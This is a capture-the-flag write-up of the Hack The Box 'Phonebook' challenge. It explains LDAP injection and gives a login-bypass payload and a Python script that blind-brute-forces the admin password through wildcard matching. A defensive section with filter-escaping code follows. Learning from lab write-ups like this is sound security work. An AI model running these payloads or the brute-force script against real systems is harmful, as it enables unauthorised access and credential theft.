This post documents my process for solving the Phonebook box on Hack The Box. The box focuses on LDAP injection and brute-forcing credentials using knowledge of LDAP search/filter syntax.
Solve
I didn’t find any obvious attack vectors except for a DOM-based HTML injection. After checking a writeup, I learned the challenge was about LDAP injection—a topic I had little prior experience with.
What is LDAP Injection?
According to PayloadAllTheThings, LDAP Injection is a vulnerability that occurs when user-supplied input is used to construct LDAP queries without proper sanitization or escaping.
Hints
On the page, there are several hints:
- “You can now login using the workstation username and password”
- Title: “Phonebook - Login”
- Potential username: “reese”
These suggest the app uses LDAP as its directory service.
Bypassing Login
Trying tools like `nikto` or `dirbuster` didn’t help. Similar to SQLi testing, using `(` or `)` can sometimes break LDAP queries. Example payload:
user = `Reese)(!(&(1=0`
pass = `q))`
This resulted in:
query = `(&(uid=admin)(!(&(1=0)(userPassword=q))))`
Using “Reese” (from the page) let me bypass authentication, but to fully exploit the system, more was needed.
Searching via the app’s search bar, I found:
Eimile Pantlin epantlin1c@admin.ch 690-650-9785
Trying “epantlin1c” with a similar payload worked too. Entering `.` in the search bar listed all possible users, likely because every email address contains a dot.
The writeup referenced HackTricks LDAP Injection for more bypass tricks.
Blind LDAP Injection (Brute-forcing Passwords)
The main goal: discover the administrator (“Reese”) password with blind LDAP injection.
Manually, trying passwords for user “reese”:
- `*` → Success
- `a*` → Failure
- `H*` → Success
This suggests the password starts with “H”. The wildcard `*` matches any sequence of characters. By iteratively adding characters (e.g., `H*`, `Ha*`, `Hab*`), you can brute-force the password one character at a time.
Because bypassing the login doesn’t get you far, the true challenge is scripting a blind brute-force for the admin password.
Example Python Script
Script based on the writeup’s logic:
```python
import requests

USERNAME = "reese"
LOGIN_URL = "http://83.136.255.192:56860/login"
# Candidate characters tried at each position of the password.
CHARACTERS = "qwertyuiopQWERTYUIOPasdfghjklASDFGHJKLzxcvbnmZXCVBNM_-[]{}1234567890"


def trylogin(user, pw):
    """Return True when the login does not bounce back to /login, i.e. the filter matched."""
    session = requests.Session()
    headers = {
        'X-Forwarded-For': pw,
        'Referer': LOGIN_URL
    }
    data = {
        "username": user,
        "password": pw
    }
    response = session.post(LOGIN_URL, headers=headers, data=data, allow_redirects=False)
    location = response.headers.get('location', '')
    return '/login' not in location


def forceone(prefix):
    """Find the next character: prefix + candidate + '*' only matches when the candidate is right."""
    for x in CHARACTERS:
        test_pw = f"{prefix}{x}*"
        if trylogin(USERNAME, test_pw):
            return x
    return ""


def forcer():
    got = ""
    while True:
        next_char = forceone(got)
        if not next_char:
            # No candidate extends the prefix: either the password is complete
            # or it contains a character outside CHARACTERS.
            print("No matching character found. Exiting.")
            break
        got += next_char
        print("Discovered so far:", got)


if __name__ == "__main__":
    forcer()
```
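From the defender's side, both tricks above (the `)(` breakout in the login payload and the `*` wildcard the blind brute-force depends on) exist only because user input is concatenated into the filter unescaped. The following is an added example, not code from the writeup or the box: it builds the login filter the naive way and with RFC 4515 escaping of the user-supplied values, and counts `(attr=` assertions as a simple check that no extra clause was smuggled in. Function names and the filter shape are assumptions modelled on the query shown above.

```python
import re

# Added defensive example (not code from the original writeup).
# RFC 4515 escaping for values placed inside an LDAP search filter.
# Backslash is handled first so the escapes it produces are not re-escaped.
_FILTER_ESCAPES = [
    ("\\", "\\5c"),
    ("*", "\\2a"),
    ("(", "\\28"),
    (")", "\\29"),
    ("\x00", "\\00"),
]

_ASSERTION_RE = re.compile(r"\(([^()=]+)=")


def escape_filter_value(value: str) -> str:
    """Escape one user-supplied value so it can only ever be a literal match."""
    for raw, enc in _FILTER_ESCAPES:
        value = value.replace(raw, enc)
    return value


def build_filter_unsafe(user: str, pw: str) -> str:
    """Naive concatenation, the construction the injection on this box relies on."""
    return f"(&(uid={user})(userPassword={pw}))"


def build_filter_safe(user: str, pw: str) -> str:
    """Same filter shape, but every attacker-controlled value is escaped."""
    return (
        f"(&(uid={escape_filter_value(user)})"
        f"(userPassword={escape_filter_value(pw)}))"
    )


def count_assertions(ldap_filter: str) -> int:
    """Count '(attr=' assertions; a login filter should contain exactly two."""
    return len(_ASSERTION_RE.findall(ldap_filter))


if __name__ == "__main__":
    user, pw = "Reese)(!(&(1=0", "q))"          # the payload from the writeup
    for build in (build_filter_unsafe, build_filter_safe):
        f = build(user, pw)
        print(f"{build.__name__}: {f}  assertions={count_assertions(f)}")
    # With escaping, the wildcard used for the blind brute-force becomes a literal.
    print(build_filter_safe("reese", "H*"))
```

With escaping in place, `H*` is compared as the literal string `H\2a`, so the per-character oracle the script above relies on no longer exists.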
Lessons Learned
- LDAP injection is analogous to SQL injection but uses different operators, filters, and wildcards (`*`).
- Username enumeration and blind brute-force attacks can be surprisingly effective with LDAP.
- Scripting is essential for blind brute-force when each character must be discovered sequentially.
- Always check public writeups and references (like HackTricks) for injection tricks.
Writeup based on my own exploitation process, with inspiration from CTF and security community references.